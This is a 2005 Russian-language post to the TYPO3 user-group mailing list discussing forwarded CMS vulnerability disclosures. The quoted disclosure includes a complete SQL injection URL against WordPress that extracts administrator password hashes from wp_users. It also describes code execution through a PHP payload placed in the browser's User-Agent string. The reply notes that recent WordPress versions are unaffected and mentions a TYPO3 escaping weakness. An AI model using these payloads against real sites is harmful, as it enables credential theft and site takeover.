[Typo3-UG Russia] Fwd: Multiple CMS/Forum Vulnablilties

Dmitry Dulepov typo3 at fm-world.ru
Tue Aug 30 11:23:41 CEST 2005


Привет!

Ну, да, из этого выходит:
http://path/to/wordpress/index.php?cat=%' UNION SELECT и т.д.

Для последних версий wordpress это неактуально. Проверил на своём блоге.

Зато в typo3 есть более замысловатая уязвимость: для преобразования
кавычек используется addslashes (вместо mysql_escape_string), что
теоретически открывает возможность для хитрого sql injection... Я писал
об этом в typo3-security-team, но они абсолютно не бум-бум в сабже. :(
Ну и фиг с ними, я локально поправил и радуюсь.

Дима.


Michael Shigorin wrote:
> ------
> next; wordpress blog sql injection ---
> ------
> 
> http://path/to/wordpress/index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*
> 
> This will give the administrator hash for the wordpress blog/CMS. We
> have also found that if you spoof you're browser to something like:
> <?php phpinfo(); ?>, and have a failed login attempt; it is eval'd,
> and you can execute your own code.



More information about the TYPO3-russia mailing list